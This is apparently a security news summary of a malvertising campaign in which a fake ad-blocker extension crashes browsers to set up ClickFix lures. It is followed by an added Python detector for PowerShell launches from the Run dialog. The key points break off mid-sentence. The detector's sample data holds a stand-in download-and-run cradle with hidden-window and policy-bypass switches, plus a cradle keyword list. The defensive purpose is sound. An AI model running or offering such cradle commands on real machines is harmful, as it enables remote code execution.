Fake ad blocker extension crashes the browser for ClickFix attacks
Key Points:
- A malvertising campaign used a fake Chrome and Edge ad-blocking extension called NexShield that crashes browsers to prepare for ClickFix attacks, delivering a Python-based remote access tool named ModeloRAT targeting corporate environments.
- NexShield, falsely marketed as a privacy-focused ad blocker from the original uBlock Origin developer, creates a denial-of-service condition by exhausting browser memory, causing crashes and forcing users to restart their browsers.
- Upon restart, NexShield displays fake security warnings prompting users to run malicious commands that execute obfuscated PowerShell scripts, installing ModeloRAT on domain-joined corporate machines or a test payload on home devices.
- Huntress researchers link the attack to the threat actor "KongTuke," noting its increasing
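The ClickFix step described in the key points leaves a recognisable footprint in endpoint telemetry: a user pastes the "fix" into the Run dialog, so PowerShell is spawned from explorer.exe with window-hiding, execution-policy-bypass and encoded-command switches. The following detector is an added example, not code from Huntress or from the article; the process-creation records and the encoded "lure" command it scores are constructed stand-ins (a harmless one-liner pointing at a `.invalid` domain), and the switch list and alert threshold are assumptions a team would tune to its own baseline.

```python
"""Score process-creation events for the ClickFix launch pattern:
PowerShell started interactively (parent explorer.exe) with switches a lure
relies on (-w hidden, -nop, -ep bypass, -enc). Added example; sample events
below are constructed, not real telemetry."""
import base64
import re
from typing import Optional

# Switch patterns that interactive, legitimate PowerShell use rarely needs.
SUSPICIOUS_SWITCHES = [
    (r"-(?:enc|ec|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile\b", "no profile"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", "execution policy bypass"),
]
# Keywords that indicate a download-and-run cradle once the -enc payload is decoded.
DOWNLOAD_CRADLE_KEYWORDS = [
    "iex", "invoke-expression", "iwr", "invoke-webrequest",
    "downloadstring", "net.webclient", "frombase64string",
]
ALERT_THRESHOLD = 3  # assumed: number of independent reasons before raising an alert


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind -enc/-ec/-EncodedCommand, or None."""
    m = re.search(r"-(?:enc|ec|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: dict) -> dict:
    """Collect reasons an event looks like a ClickFix launch; score = reason count."""
    cmd = event["command_line"]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if image not in {"powershell.exe", "pwsh.exe"}:
        return {"score": 0, "reasons": reasons}
    for pattern, label in SUSPICIOUS_SWITCHES:
        if re.search(pattern, cmd, re.I):
            reasons.append(label)
    if parent == "explorer.exe":
        # Win+R / Run dialog and pasted commands show explorer.exe as parent.
        reasons.append("launched interactively from explorer.exe")
    decoded = decode_encoded_command(cmd)
    if decoded:
        hits = [k for k in DOWNLOAD_CRADLE_KEYWORDS if k in decoded.lower()]
        if hits:
            reasons.append("decoded payload has cradle keywords: " + ", ".join(hits))
    return {"score": len(reasons), "reasons": reasons}


def triage(events: list) -> list:
    """Return one verdict per event, flagging those at or above the threshold."""
    out = []
    for ev in events:
        verdict = assess(ev)
        out.append({"id": ev["id"], "score": verdict["score"],
                    "alert": verdict["score"] >= ALERT_THRESHOLD,
                    "reasons": verdict["reasons"]})
    return out


# Constructed stand-in for a lure payload (harmless, points at a .invalid host).
_LURE_STANDIN = base64.b64encode(
    "iex (iwr http://lure.invalid/check)".encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed process-creation records
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -nop -ep bypass -enc {_LURE_STANDIN}"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for verdict in triage(SAMPLE_EVENTS):
        flag = "ALERT" if verdict["alert"] else "ok   "
        print(f"{flag} event {verdict['id']} score={verdict['score']} "
              f"{'; '.join(verdict['reasons'])}")
```

Only event 1 crosses the threshold: a scheduled script run from cmd.exe with `-File` collects no reasons, and the explorer.exe parent on its own is worth one point, not an alert. Pairing this with the browser-side symptom in the article (a burst of crash reports followed shortly by a Run-dialog PowerShell launch) gives a tighter correlation rule than either signal alone.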